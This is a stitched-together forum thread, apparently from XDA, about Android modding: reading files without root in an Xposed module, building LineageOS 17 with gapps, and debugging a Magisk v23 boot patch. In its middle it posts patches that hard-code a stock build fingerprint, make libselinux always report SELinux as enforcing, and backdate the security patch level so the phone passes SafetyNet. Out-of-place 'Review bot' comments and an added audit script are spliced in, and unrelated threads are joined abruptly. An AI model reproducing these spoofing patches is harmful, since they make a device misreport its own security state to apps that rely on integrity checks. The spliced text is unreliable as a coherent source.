Currently, I'm using
Code:
String line;
process = new ProcessBuilder("su", "-c", "cat", MODULES_LIST_FILE).start();
BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = in.readLine()) != null) {
modules.add(line);
}
in.close();
- which does work, I'd just prefer to not require root access.
Where could I possibly hook to give me access to this file?
Thanks!
I believe that the "android" package has access to all data. So you could hook handleLoadPackage, wait for the "android" package to load, then try reading your file. Not sure if it'd work or not, though. You wouldn't have to hook any specific method.
@razorloves I compiled my own unofficial LineageOS 17.0 for Marlin from your sources, but I don't have gapps compiled in. Is it possible to install gapps over the Lineage zip file? When I tried, it said that it thought I had Android 9, and it needed Android 10, so it wouldn't install.
ocarinaz64 said:
I compiled my own unofficial LineageOS 17.0 for Marlin from your sources, but I don't have gapps compiled in. Is it possible to install gapps over the Lineage zip file? When I tried, it said that it thought I had Android 9, and it needed Android 10, so it wouldn't install.
I have tried the same too... Android 10 appears to lock out the ability to mount /system as rw in recovery from my understanding.
I have had no luck compiling LOS 17 with opengapps at all.
GT3CH1 said:
I have tried the same too... Android 10 appears to lock out the ability to mount /system as rw in recovery from my understanding.
I have had no luck compiling LOS 17 with opengapps at all.
I was able to easily delete some of the safety checks on the gapps install script. It ran the installation .zip, but nothing appeared differently when I booted into the ROM. I got the same result with every gapps package I have found so far. So far the only way I can get gapps then is this ROM where it's already built into it.
ocarinaz64 said:
I was able to easily delete some of the safety checks on the gapps install script. It ran the installation .zip, but nothing appeared differently when I booted into the ROM. I got the same result with every gapps package I have found so far. So far the only way I can get gapps then is this ROM where it's already built into it.
I was able to extract all of the opengapps files from one of their installers and attempt to push it to LOS17... I ended up with a continuous bootloop because of a priv-app permissions issue... which was weird because I added the permissions to the right files, but it still erred out.
If anyone has any bright ideas, I would love to contribute some of my server space to set up nightly builds of LOS17 (stock LOS17 works just fine), but I want see if there is a good way to add in gapps to the build first.
GT3CH1 said:
I was able to extract all of the opengapps files from one of their installers and attempt to push it to LOS17... I ended up with a continuous bootloop because of a priv-app permissions issue... which was weird because I added the permissions to the right files, but it still erred out.
If anyone has any bright ideas, I would love to contribute some of my server space to set up nightly builds of LOS17 (stock LOS17 works just fine), but I want see if there is a good way to add in gapps to the build first.
I've been trying to build with open gapps integrated into the rom as well. I managed to get it to build without errors (which is a bit tricky at the moment as the current state of the branches is breaking the build), but I got boot loops that I haven't been able to diagnose.
This is using the instructions here
https://github.com/opengapps/aosp_build/blob/master/README.md
But would be ideal if razorloves could give us the relevant details on how to do build with mindthegapps.
For your issue on permissions, have you set the selinux contexts?
NZedPred said:
I've been trying to build with open gapps integrated into the rom as well. I managed to get it to build without errors (which is a bit tricky at the moment as the current state of the branches is breaking the build), but I got boot loops that I haven't been able to diagnose.
This is using the instructions here
https://github.com/opengapps/aosp_build/blob/master/README.md
But would be ideal if razorloves could give us the relevant details on how to do build with mindthegapps.
For your issue on permissions, have you set the selinux contexts?
I haven't been able to mess with selinux yet... I'm waiting for a break so that I can sit and mess with my phone again.
I second the idea of getting the details to build with MTG. I did what the aosp build instructions said for opengapps. It acted like it pulled the repo down, but it isn't copying the APK's over to the final zip install. Maybe I am missing something.
GT3CH1 said:
I haven't been able to mess with selinux yet... I'm waiting for a break so that I can sit and mess with my phone again.
I second the idea of getting the details to build with MTG. I did what the aosp build instructions said for opengapps. It acted like it pulled the repo down, but it isn't copying the APK's over to the final zip install. Maybe I am missing something.
For the apk issue, you need to make sure you have git lfs installed, and for each of the folders in vendor/opengapps/sources/ do a git lfs pull.
I made that mistake as well... Repo doesn't appear to apply the git lfs pull on its own. The files that you have are just text files with URLs to the files.
NZedPred said:
For the apk issue, you need to make sure you have git lfs installed, and for each of the folders in vendor/opengapps/sources/ do a git lfs pull.
I made that mistake as well... Repo doesn't appear to apply the git lfs pull on its own. The files that you have are just text files with URLs to the files.
I did that too.... Something else is going on with my system then. I did a git lfs pull on each directory, and it looked like it pulled down the apps - the file sizes changed... I might just wipe my current opengapps directory, allocate a little more disk space, and re do that pull.
I am trying to build with MTG at the moment, despite the super vague readme.
GT3CH1 said:
I did that too.... Something else is going on with my system then. I did a git lfs pull on each directory, and it looked like it pulled down the apps - the file sizes changed... I might just wipe my current opengapps directory, allocate a little more disk space, and re do that pull.
I am trying to build with MTG at the moment, despite the super vague readme.
I just re-read what you said about the final zip install, sorry I mis-read that. Did you create a file device/google/sailfish/device.mk and put the lines in? If so, they actually need to go into device/google/marlin/device-sailfish.mk. I made that mistake, and it didn't put anything into the final zip. You will get some other build errors that you have to work around after doing that change though... (Yes it's frustrating).
In any case, thanks for the link to the MTG readme. I'll have a go when I'm at home and see if I have any luck...
NZedPred said:
I just re-read what you said about the final zip install, sorry I mis-read that. Did you create a file device/google/sailfish/device.mk and put the lines in? If so, they actually need to go into device/google/marlin/device-sailfish.mk. I made that mistake, and it didn't put anything into the final zip. You will get some other build errors that you have to work around after doing that change though... (Yes it's frustrating).
In any case, thanks for the link to the MTG readme. I'll have a go when I'm at home and see if I have any luck...
No worries. Even though I've got a marlin, does it go under device-marlin.mk? That wouldn't make any sense...
For MTG I added this to my .repo/manifests/default.xml
Code:
<remote name="mtg" fetch="https://gitlab.com/MindTheGapps/" />
<project path="vendor/gapps" name="vendor_gapps" revision="qoppa" remote="mtg" />
And it is acting like it is syncing properly. Step 2 has got me a little bit confused... I am going to assume that it is similar to opengapps
Code:
$(call inherit-product, vendor/opengapps/build/opengapps-packages.mk)
line for device-marlin.mk, but just modified for MTG.
It'd be cool if this works. I'd love to have my own build of LOS working.
---------- Post added at 02:48 AM ---------- Previous post was at 01:51 AM ----------
NZedPred said:
I just re-read what you said about the final zip install, sorry i mis-read that. Did you create a file device/google/sailfish/device.mk and put the lines in? If so, they actually need to go into device/google/marlin/device-sailfish.mk. I did that mistake, and it didn't put anything into the final zip. You will get some other build errors that you have to work around after don't that change though... (Yes it's frustrating).
In any case, thanks for the link to the MTG readme. I'll have a go when I'm at home and see if I have any luck...
Ok, I was able to get gapps to *almost* work - log shows that it is copying the files and all the fun stuff... however...
Code:
'linux/msm_ion.h' file not found
is appearing from
Code:
file included from device/google/marlin/camera/QCamera2/stack/mm-camera-test/src/mm_qcamera_reprocess.c:31:
02:42:21 device/google/marlin/camera/QCamera2/stack/mm-camera-test/inc/mm_qcamera_app.h
I'm gonna clean the build dir... see if that works.
I've done the same change to the manifest. I would suggest though once you get it up and running, that you don't make the change directly to the default manifest, but rather put it into e.g. .repo/local_manifests/mindthegapps.xml. That way it won't get overwritten if the default manifest gets updated.
I had a build just complete with that change, but as it was practically built anyway, I'm trying from a clean build directory just to make sure it definitely builds! The only change in my case for sailfish is adding the line
Code:
$(call inherit-product, vendor/gapps/arm64/arm64-vendor.mk)
near the bottom of device/google/marlin/device-sailfish.mk. You'd do the same in the device/google/marlin/device-marlin.mk file.
If the build compiles successfully then I'll probably put together a start-to-finish guide on how to do this. I also want to do a "user" build that is signed, and see if it's possible to pass safety net without requiring magisk. But for now, my fingers are crossed that I just get a basic build done!
Been building for a couple weeks using razorloves' gapps, then switched to shagbag913's gapps. Added the call inherit-product code to device/google/marlin/sailfish/device-lineage.mk but your way should work.
Everything has been working fine except for Android Auto which I think is a bigger GApps issue.
Can someone explain how to either properly install a pre-built gapps package for Android 10 and / or explain how to properly build gapps packages into a ROM (if such action is even legal)?
I followed the instructions from https://github.com/opengapps/aosp_build/blob/master/README.md and ended up getting build errors that I couldn't push through.
@razorloves, I would love your input since you have already accomplished this.
Hi,
I have written up a quick documentation on how to do this with MTG and my Google apps package.
Please take a look at it here.
My Google apps package (gavapps) may or may not work for your device; I have specifically fine-tuned it to work for a Google Pixel XL.
HOWEVER,
If you follow the instructions for the Mind The GApps, you will be able to compile a version of Android 10 with the Google play store.
For those who care, I was able to compile the most recent of LOS17 for Google Pixel XL with a couple of gapps pre-built.
Link is here
user build with release keys
I mentioned before I was going to attempt to do a build that would pass safety net without needing to install Magisk and use hiding modules. I haven't quite managed that, but thought I'd post details of the progress that I've made.
Note for the below, I have a Pixel, so my codename is always sailfish - replace with marlin for the Pixel XL. Also, follow the instructions above to include MindTheGapps (you need the Google services to do the SafetyNet check).
Now, importantly, I found that the Eleven app didn't compile under a user build (it's fine in a userdebug build). If you find the same issue, it's best to remove it from the project by adding this to a local manifest, e.g. .repo/local_manifests/excluded-projects.xml
Code:
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<!-- Does not compile in a user build -->
<remove-project name="LineageOS/android_packages_apps_Eleven" />
</manifest>
Follow instructions in this link to set up some build keys:
https://wiki.lineageos.org/signing_builds.html (the section Generating the keys). For convenience, the commands are pasted below (customize the subject):
Code:
subject='/C=US/ST=California/L=Mountain View/O=Android/OU=Android/CN=Android/[email protected]'
mkdir ~/.android-certs
for x in releasekey platform shared media testkey; do \
./development/tools/make_key ~/.android-certs/$x "$subject"; \
done
Now for building, do a 'repo sync' and 'source build/envsetup.sh' as you normally would, but now it's time to apply a few patches.
Kernel command line patch:
https://gist.github.com/kirelagin/211af699bd321f9448d310502074bd9c
Or get the raw version of the patch directly here:
https://gist.githubusercontent.com/...e45f468cbefc3a9c571bd3d8b2a877/safetynet.diff
This patch needs to be applied to the kernel/google/marlin folder. Its purpose is to change a few flags in the command line to remove the fact that the bootloader is unlocked, etc.
Code:
cd kernel/google/marlin
git apply safetynet.diff
The below is not required now, a recent patch fixed this issue
Now normally, as the build files replace the device fingerprint with the fingerprint from stock, we would expect that running e.g. "getprop | grep fingerprint" in a shell in the ROM would return said fingerprint in all cases. However, I always found that one, 'ro.build.fingerprint', would always be the default Lineage build fingerprint. I couldn't find how to get that one in particular to be the same as the others, so I ended up doing something that isn't portable but works.
Patch system/core/base/properties.cpp by applying one of the following patches (you must be within the system/core folder)
Sailfish:
Code:
diff --git a/base/properties.cpp b/base/properties.cpp
index d5a5918ce..49959ffad 100644
--- a/base/properties.cpp
+++ b/base/properties.cpp
@@ -79,6 +79,10 @@ static int __system_property_set(const char* key, const char* value) {
std::string GetProperty(const std::string& key, const std::string& default_value) {
std::string property_value;
+ if (key == "ro.build.fingerprint") {
+ property_value = "google/sailfish/sailfish:10/QP1A.191005.007.A1/5908163:user/release-keys";
+ return property_value;
+ }
#if defined(__BIONIC__)
const prop_info* pi = __system_property_find(key.c_str());
if (pi == nullptr) return default_value;
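Review bot: the early return for ro.build.fingerprint short-circuits GetProperty() for every caller, so neither the real property nor the default_value argument is ever consulted for that key, and a per-device literal ends up inside a library shared by all products. Since the fingerprint string is already defined in device/google/marlin/lineage_sailfish.mk (as the text below notes), it would be cleaner to have the build set ro.build.fingerprint from there than to special-case one key in libbase.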
If you have a Marlin, use the following:
Code:
diff --git a/base/properties.cpp b/base/properties.cpp
index d5a5918ce..49959ffad 100644
--- a/base/properties.cpp
+++ b/base/properties.cpp
@@ -79,6 +79,10 @@ static int __system_property_set(const char* key, const char* value) {
std::string GetProperty(const std::string& key, const std::string& default_value) {
std::string property_value;
+ if (key == "ro.build.fingerprint") {
+ property_value = "google/marlin/marlin:10/QP1A.191005.007.A1/5908163:user/release-keys";
+ return property_value;
+ }
#if defined(__BIONIC__)
const prop_info* pi = __system_property_find(key.c_str());
if (pi == nullptr) return default_value;
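Review bot: this diff carries the identical `index d5a5918ce..49959ffad` line as the sailfish version even though the resulting file content differs (the literal is google/marlin/... here), so the post-image blob id cannot be correct for both; plain `git apply` does not check it, but `git apply --3way` relies on those ids. Regenerate the diff from a real commit or drop the index line.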
The value of the fingerprint is in the file device/google/marlin/lineage_[sailfish/marlin].mk. The patches above have a very simple job - if the ro.build.fingerprint property is requested, return a hard-coded value. Simple, works, but needs to be changed per device, and won't ever be seen in the Lineage repo :silly:
At the moment, the builds have SELinux in permissive mode. I've read that one of the CTS profile checks is to ensure that SELinux is in enforcing mode. We can override this by patching two files from within the external/selinux folder
Code:
diff --git a/libselinux/src/selinux_config.c b/libselinux/src/selinux_config.c
index b06cb63b..7877010c 100644
--- a/libselinux/src/selinux_config.c
+++ b/libselinux/src/selinux_config.c
@@ -87,44 +87,8 @@ static const uint16_t file_path_suffixes_idx[NEL] = {
int selinux_getenforcemode(int *enforce)
{
- int ret = -1;
- FILE *cfg = fopen(SELINUXCONFIG, "re");
- if (cfg) {
- char *buf;
- int len = sizeof(SELINUXTAG) - 1;
- buf = malloc(selinux_page_size);
- if (!buf) {
- fclose(cfg);
- return -1;
- }
- while (fgets_unlocked(buf, selinux_page_size, cfg)) {
- if (strncmp(buf, SELINUXTAG, len))
- continue;
- if (!strncasecmp
- (buf + len, "enforcing", sizeof("enforcing") - 1)) {
- *enforce = 1;
- ret = 0;
- break;
- } else
- if (!strncasecmp
- (buf + len, "permissive",
- sizeof("permissive") - 1)) {
- *enforce = 0;
- ret = 0;
- break;
- } else
- if (!strncasecmp
- (buf + len, "disabled",
- sizeof("disabled") - 1)) {
- *enforce = -1;
- ret = 0;
- break;
- }
- }
- fclose(cfg);
- free(buf);
- }
- return ret;
+ *enforce = 1;
+ return 0;
}
hidden_def(selinux_getenforcemode)
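Review bot: the rewritten selinux_getenforcemode() no longer reads SELINUXCONFIG at all, so every libselinux caller is told the policy is enforcing while the kernel may still be permissive (the text above says these builds are permissive). That makes the library misreport rather than change anything; the fix the CTS requirement actually asks for is to ship an enforcing policy, i.e. boot enforcing and resolve the denials. It also drops the -1 return, so a caller can no longer tell "config unreadable" from "enforcing".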
diff --git a/libselinux/src/sestatus.c b/libselinux/src/sestatus.c
index ed29dc55..5b057932 100644
--- a/libselinux/src/sestatus.c
+++ b/libselinux/src/sestatus.c
@@ -130,30 +130,7 @@ int selinux_status_updated(void)
*/
int selinux_status_getenforce(void)
{
- uint32_t seqno;
- uint32_t enforcing;
-
- if (selinux_status == NULL) {
- errno = EINVAL;
- return -1;
- }
-
- if (selinux_status == MAP_FAILED) {
- if (avc_netlink_check_nb() < 0)
- return -1;
-
- return fallback_enforcing;
- }
-
- /* sequence must not be changed during references */
- do {
- seqno = read_sequence(selinux_status);
-
- enforcing = selinux_status->enforcing;
-
- } while (seqno != read_sequence(selinux_status));
-
- return enforcing ? 1 : 0;
+ return 1;
}
/*
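Review bot: selinux_status_getenforce() previously signalled "not initialised" with errno = EINVAL and -1, and fell back to avc_netlink_check_nb()/fallback_enforcing when the status page was not mapped; the stub `return 1;` drops both error paths, so a caller testing for -1 never learns the status page is unavailable, and the mmap'd `selinux_status->enforcing` is ignored even when it is mapped. Same remark as the first file: this reports a mode instead of setting one.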
Now, I have a script that does the steps of:
- Sets up a user build
- Builds the appropriate files used for a signed build
- Signs the APKs
- Creates an installable zip / OTA from the signed zips
Code:
#!/bin/bash
echo "This script must be sourced."
BUILD="user"
DEVICE="sailfish"
DATE=$(date +%Y-%m-%d)
VERSION=17.0
croot && lunch lineage_$DEVICE-$BUILD
SIGNED_TARGET="$OUT/lineage-$VERSION-$DEVICE-signed-target_files-$BUILD-$DATE.zip"
SIGNED_OTA="$OUT/lineage-$VERSION-$DEVICE-signed-ota-$BUILD-$DATE.zip"
mka target-files-package otatools && \
./build/tools/releasetools/sign_target_files_apks -o -d ~/.android-certs $OUT/obj/PACKAGING/target_files_intermediates/*-target_files-*.zip $SIGNED_TARGET && \
./build/tools/releasetools/ota_from_target_files -k ~/.android-certs/releasekey --block $SIGNED_TARGET $SIGNED_OTA
It must be sourced (i.e. source do-build #or whatever you call the script). You can easily change some of the parameters above, e.g. sailfish to marlin.
So for my testing, after doing the above changes, I can get a basic integrity pass in Safety Net, but not a CTS profile pass. I tried using Magisk, and it passes Safety Net without the need for using any further prop tweaks (normally I would still need one of those). So at least that is a little bit of progress.
Hope that this is helpful to someone. And if anyone has any other insights as to what can be done to try and get a CTS profile match, let us all know!
So to my understanding, you've been able to pass the basic integrity check but not the ctsProfile, however, once you flash Magisk, it all of a sudden starts working w/o the MagiskProps module?? My goal for my builds of Lineage is to completely get rid of Magisk as a whole, and have the apps I normally flash with Magisk pre-installed (just YouTube Vanced and Viper4Android at the moment) and a few build.prop tweaks.
What I'm thinking for conquering this idea of yours is to copy the files that MagiskProps creates/modifies in its module directory, and then have those files pushed automatically to the image when being built.
What do you think of that?
Hey, yes we have similar goals there. I'm hoping to build Lineage without the need for Magisk to pass SafetyNet including the CTS profile check, and add in my own selection of apps etc.
I have been looking at the code for Magisk, hoping to work out exactly what it does. I'm not so sure it will be as simple as copying files as you have said above, although I have toyed with that idea in my head. If you work out how to do that, certainly let us know.
Another idea I had was to see if Magisk can be compiled to act as it currently does but without including the su, busybox, and other binaries that would trip SafetyNet.
Edit: I'm also just trying to find specific things that Magisk does to aid hiding. For example, I found this in the hide_policy.cpp file:
Code:
static const char *prop_key[] =
{ "ro.boot.vbmeta.device_state", "ro.boot.verifiedbootstate", "ro.boot.flash.locked",
"ro.boot.veritymode", "ro.boot.warranty_bit", "ro.warranty_bit", "ro.debuggable",
"ro.secure", "ro.build.type", "ro.build.tags", "ro.build.selinux", nullptr };
static const char *prop_value[] =
{ "locked", "green", "1",
"enforcing", "0", "0", "0",
"1", "user", "release-keys", "0", nullptr };
void hide_sensitive_props() {
LOGI("hide_policy: Hiding sensitive props\n");
// Hide all sensitive props
for (int i = 0; prop_key[i]; ++i) {
auto value = getprop(prop_key[i]);
if (!value.empty() && value != prop_value[i])
setprop(prop_key[i], prop_value[i], false);
}
}
That is used to override some of the props, if they aren't empty and don't match the required values. In the case of my build, they all match the values above or are empty. So I'm still digging into the code to find out what else might be needed. I do know that SELinux is set to Enforcing (hence my patch in my previous post) as another example.
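To see how a property dump actually measures up against that table, here is an added example (my code, not Magisk's) that parses `getprop` output, applies the same skip-if-empty rule hide_sensitive_props() uses, and adds the two fingerprint cross-checks the thread ran into: all `*.fingerprint` properties agreeing with each other, and the type/tags tail of ro.build.fingerprint agreeing with ro.build.type and ro.build.tags. The dump is constructed; it is the kind of consistency check an integrity checker can run on the device side.

```python
"""Consistency audit of an Android property dump (added example, not Magisk's
code): applies the key/value table quoted from hide_policy.cpp, then adds the
fingerprint cross-checks discussed in the thread."""
import re

# The eleven keys and expected values from hide_policy.cpp, as quoted above.
EXPECTED = {
    "ro.boot.vbmeta.device_state": "locked",
    "ro.boot.verifiedbootstate": "green",
    "ro.boot.flash.locked": "1",
    "ro.boot.veritymode": "enforcing",
    "ro.boot.warranty_bit": "0",
    "ro.warranty_bit": "0",
    "ro.debuggable": "0",
    "ro.secure": "1",
    "ro.build.type": "user",
    "ro.build.tags": "release-keys",
    "ro.build.selinux": "0",
}

# getprop prints one "[key]: [value]" pair per line.
_GETPROP_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<val>.*)\]$")


def parse_getprop(dump):
    """Parse `getprop` output into a dict; lines that do not match are ignored."""
    props = {}
    for line in dump.splitlines():
        m = _GETPROP_LINE.match(line.strip())
        if m:
            props[m.group("key")] = m.group("val")
    return props


def deviating_props(props):
    """Keys set to something other than the expected value. Empty or absent
    keys are skipped, the same rule hide_sensitive_props() applies."""
    return {k: props[k] for k, want in EXPECTED.items()
            if props.get(k, "") != "" and props[k] != want}


def fingerprint_variants(props):
    """All *.fingerprint properties, returned only if they disagree.
    The thread's symptom: every fingerprint matched stock except
    ro.build.fingerprint, which kept the Lineage default."""
    fps = {k: v for k, v in props.items() if k.endswith(".fingerprint")}
    return fps if len(set(fps.values())) > 1 else {}


def fingerprint_mismatches(props):
    """Check that the "type/tags" tail of ro.build.fingerprint agrees with
    ro.build.type and ro.build.tags. Forcing the fingerprint string alone
    (as the libbase patch earlier in the thread does) leaves these out of step."""
    fp = props.get("ro.build.fingerprint", "")
    # Layout: brand/product/device:release/id/incremental:type/tags
    _head, sep, tail = fp.rpartition(":")
    if not sep or "/" not in tail:
        return ["ro.build.fingerprint missing or malformed"]
    fp_type, fp_tags = tail.split("/", 1)
    problems = []
    for key, from_fp in (("ro.build.type", fp_type), ("ro.build.tags", fp_tags)):
        if key in props and props[key] != from_fp:
            problems.append(f"{key}={props[key]} but fingerprint says {from_fp}")
    return problems


# Constructed sample dump: a userdebug build whose ro.build.fingerprint was
# forced to the stock string while the rest of the build was left as-is.
SAMPLE_DUMP = """\
[ro.boot.verifiedbootstate]: [orange]
[ro.boot.flash.locked]: [0]
[ro.build.fingerprint]: [google/sailfish/sailfish:10/QP1A.191005.007.A1/5908163:user/release-keys]
[ro.build.tags]: [test-keys]
[ro.build.type]: [userdebug]
[ro.debuggable]: [1]
[ro.secure]: [1]
[ro.vendor.build.fingerprint]: [lineage/lineage_sailfish/sailfish:10/CONSTRUCTED/1:userdebug/test-keys]
"""


def audit(dump):
    """Run all three checks over a getprop dump and return them keyed by name."""
    props = parse_getprop(dump)
    return {
        "deviating": deviating_props(props),
        "fingerprints": fingerprint_variants(props),
        "fingerprint_mismatches": fingerprint_mismatches(props),
    }


if __name__ == "__main__":
    for name, result in audit(SAMPLE_DUMP).items():
        print(f"{name}: {result}")
```

Feed it the output of `adb shell getprop` to audit a real build instead of the constructed dump.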
Hmm. I wonder if Magisk is using itself to check ctsProfile via root... It would make sense to me if it did.
Are you able to install Google apps through the Play Store (i.e. Google Calendar)? When I had a failing ctsProfile, I wasn't able to install Google Calendar.
Eureka!
I believe the phrase is "Eureka!"
I erred before - when I went back to installing Magisk, of course it keeps modules installed, which resulted in the pass. It would have failed...
However, reading the props module readme said that the security_patch date had to match that of the fingerprint. So I edited the build/make/core/version_defaults.mk file so that PLATFORM_SECURITY_PATCH is 2019-10-06 as per this patch:
Code:
diff --git a/core/version_defaults.mk b/core/version_defaults.mk
index b803ff81a..08ffb1a53 100644
--- a/core/version_defaults.mk
+++ b/core/version_defaults.mk
@@ -250,7 +250,7 @@ ifndef PLATFORM_SECURITY_PATCH
# It must be of the form "YYYY-MM-DD" on production devices.
# It must match one of the Android Security Patch Level strings of the Public Security Bulletins.
# If there is no $PLATFORM_SECURITY_PATCH set, keep it empty.
- PLATFORM_SECURITY_PATCH := 2019-11-05
+ PLATFORM_SECURITY_PATCH := 2019-10-06
endif
.KATI_READONLY := PLATFORM_SECURITY_PATCH
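Review bot: the `ifndef PLATFORM_SECURITY_PATCH` guard visible in the hunk header means this value is only a default, so it is worth setting PLATFORM_SECURITY_PATCH := 2019-10-06 from the device or board makefile, next to the fingerprint it has to match, rather than carrying a local edit to build/make. Also note the comment in the hunk itself: the string must match a published bulletin level, and moving it back from 2019-11-05 declares an older patch level than the source tree actually contains.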
Hello everybody,
I hope all of you have good health and a good life... sorry if my English is rubbish.
My question is that Magisk v23 doesn't flash my phone the right way. It works perfectly on v24+, but I'm just not comfortable with MagiskHide removed and Zygisk and more things. I found that this commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 solved the problem with fstab. I am not a developer, I am just a user, but I could help myself to understand with guides.
So is there a way to change or apply the changes in this commit to v23 and flash my phone with it? If so, I would really appreciate a quick guide to help me do so...
Thanks in advance.
I hope you all have a good day.
Here, try this 3rd party version of Magisk 25.2 Delta. It has MagiskHide and no need to turn on Zygisk. You probably will have to patch your boot.img though. There is info on how to move to this version of Magisk... If you want LSPosed, first download Riru v26.1.6, install that and reboot, then get LSPosed riru 1.8.3, install and reboot. You can hide all banking apps and most that don't work with Zygisk turned on. There is a good explanation of how Zygisk can be detected by a lot of apps. Hope this helps.
Lots of bugs, my friend. Sorry I'm late reading your reply and testing it.
I need to build Magisk from source after editing this file from v23.0 https://github.com/topjohnwu/Magisk/blob/v23.0/native/jni/init/twostage.cpp to be similar in function to this file from v24.2 https://github.com/topjohnwu/Magisk/blob/v24.2/native/jni/init/twostage.cpp, but I got errors when starting to build the binaries. Any help from here?
Sorry, I can't assist you with editing the file...
It's OK my friend, thanks for trying to help anyway.
If you would please... if you know someone here who can, please mention him/her here.
Hope you have a good day.
@Didgeridoohan any help here brother, if you may accept this.
My problem is that I edited v23.0 twostage.cpp to be similar to this commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6, which solves the bootloop for Samsung A528B/A52s 5G, but after building and then flashing the stock AP file with my newly built Magisk it still gets a bootloop. What did I do wrong? I attached twostage.cpp after editing, and many thanks to all of the XDA users who would help me and who wouldn't.
Code:
#include <sys/mount.h>

#include <magisk.hpp>
#include <utils.hpp>
#include <socket.hpp>

#include "init.hpp"

using namespace std;

void fstab_entry::to_file(FILE *fp) {
    fprintf(fp, "%s %s %s %s %s\n", dev.data(), mnt_point.data(),
            type.data(), mnt_flags.data(), fsmgr_flags.data());
}

#define set_info(val) \
line[val##1] = '\0'; \
entry.val = &line[val##0];

#define FSR "/first_stage_ramdisk"

extern uint32_t patch_verity(void *buf, uint32_t size);

void FirstStageInit::prepare() {
    if (cmd->force_normal_boot) {
        xmkdirs(FSR "/system/bin", 0755);
        rename("/init" /* magiskinit */, FSR "/system/bin/init");
        symlink("/system/bin/init", FSR "/init");
        rename("/.backup/init", "/init");
        rename("/.backup", FSR "/.backup");
        rename("/overlay.d", FSR "/overlay.d");
        chdir(FSR);
    } else {
        xmkdir("/system", 0755);
        xmkdir("/system/bin", 0755);
        rename("/init" /* magiskinit */ , "/system/bin/init");
        rename("/.backup/init", "/init");
    }

    char fstab_file[128];
    fstab_file[0] = '\0';

    // Find existing fstab file
    for (const char *suffix : { cmd->fstab_suffix, cmd->hardware, cmd->hardware_plat }) {
        if (suffix[0] == '\0')
            continue;
        for (const char *prefix: { "odm/etc/fstab", "vendor/etc/fstab", "fstab" }) {
            sprintf(fstab_file, "%s.%s", prefix, suffix);
            if (access(fstab_file, F_OK) != 0) {
                fstab_file[0] = '\0';
            } else {
                LOGD("Found fstab file: %s\n", fstab_file);
                goto exit_loop;
            }
        }
    }
exit_loop:

    // Try to load dt fstab
    vector<fstab_entry> fstab;
    read_dt_fstab(fstab);
    if (!fstab.empty()) {
        // Dump dt fstab to fstab file in rootfs and force init to use it instead
        // All dt fstab entries should be first_stage_mount
        for (auto &entry : fstab) {
            if (!str_contains(entry.fsmgr_flags, "first_stage_mount")) {
                if (!entry.fsmgr_flags.empty())
                    entry.fsmgr_flags += ',';
                entry.fsmgr_flags += "first_stage_mount";
            }
        }
        if (fstab_file[0] == '\0') {
            const char *suffix =
                    cmd->fstab_suffix[0] ? cmd->fstab_suffix :
                    (cmd->hardware[0] ? cmd->hardware :
                    (cmd->hardware_plat[0] ? cmd->hardware_plat : nullptr));
            if (suffix == nullptr) {
                LOGE("Cannot determine fstab suffix!\n");
                return;
            }
            sprintf(fstab_file, "fstab.%s", suffix);
        }
        // Patch init to force IsDtFstabCompatible() return false
        auto init = mmap_data::rw("/init");
        init.patch({ make_pair("android,fstab", "xxx") });
    } else {
        // Parse and load the fstab file
        file_readline(fstab_file, [&](string_view l) -> bool {
            if (l[0] == '#' || l.length() == 1)
                return true;
            char *line = (char *) l.data();
            int dev0, dev1, mnt_point0, mnt_point1, type0, type1,
                mnt_flags0, mnt_flags1, fsmgr_flags0, fsmgr_flags1;

            sscanf(line, "%n%*s%n %n%*s%n %n%*s%n %n%*s%n %n%*s%n",
                   &dev0, &dev1, &mnt_point0, &mnt_point1, &type0, &type1,
                   &mnt_flags0, &mnt_flags1, &fsmgr_flags0, &fsmgr_flags1);

            fstab_entry entry;
            set_info(dev);
            set_info(mnt_point);
            set_info(type);
            set_info(mnt_flags);
            set_info(fsmgr_flags);
            fstab.emplace_back(std::move(entry));
            return true;
        });
    }

    {
        LOGD("Write fstab file: %s\n", fstab_file);
        auto fp = xopen_file(fstab_file, "we");
        for (auto &entry : fstab) {
            // Redirect system mnt_point so init won't switch root in first stage init
            if (entry.mnt_point == "/system")
                entry.mnt_point = "/system_root";

            // Force remove AVB for 2SI since it may bootloop some devices
            auto len = patch_verity(entry.fsmgr_flags.data(), entry.fsmgr_flags.length());
            entry.fsmgr_flags.resize(len);

            entry.to_file(fp.get());
        }
    }
    chmod(fstab_file, 0644);

    chdir("/");
}

#define INIT_PATH  "/system/bin/init"
#define REDIR_PATH "/system/bin/am"

void SARInit::first_stage_prep() {
    xmount("tmpfs", "/dev", "tmpfs", 0, "mode=755");

    // Patch init binary
    int src = xopen("/init", O_RDONLY);
    int dest = xopen("/dev/init", O_CREAT | O_WRONLY, 0);
    {
        auto init = mmap_data::ro("/init");
        init.patch({ make_pair(INIT_PATH, REDIR_PATH) });
        write(dest, init.buf, init.sz);
        fclone_attr(src, dest);
        close(dest);
    }

    // Replace redirect init with magiskinit
    dest = xopen("/dev/magiskinit", O_CREAT | O_WRONLY, 0);
    write(dest, self.buf, self.sz);
    fclone_attr(src, dest);
    close(src);
    close(dest);

    xmount("/dev/init", "/init", nullptr, MS_BIND, nullptr);
    xmount("/dev/magiskinit", REDIR_PATH, nullptr, MS_BIND, nullptr);
    xumount2("/dev", MNT_DETACH);

    // Block SIGUSR1
    sigset_t block, old;
    sigemptyset(&block);
    sigaddset(&block, SIGUSR1);
    sigprocmask(SIG_BLOCK, &block, &old);

    if (int child = xfork()) {
        LOGD("init daemon [%d]\n", child);
        // Wait for children signal
        int sig;
        sigwait(&block, &sig);

        // Restore sigmask
        sigprocmask(SIG_SETMASK, &old, nullptr);
    } else {
        // Establish socket for 2nd stage ack
        struct sockaddr_un sun;
        int sockfd = xsocket(AF_LOCAL, SOCK_STREAM | SOCK_CLOEXEC, 0);
        xbind(sockfd, (struct sockaddr*) &sun, setup_sockaddr(&sun, INIT_SOCKET));
        xlisten(sockfd, 1);

        // Resume parent
        kill(getppid(), SIGUSR1);

        // Wait for second stage ack
        int client = xaccept4(sockfd, nullptr, nullptr, SOCK_CLOEXEC);

        // Write backup files
        string tmp_dir = read_string(client);
        chdir(tmp_dir.data());
        int cfg = xopen(INTLROOT "/config", O_WRONLY | O_CREAT, 0);
        xwrite(cfg, config.buf, config.sz);
        close(cfg);
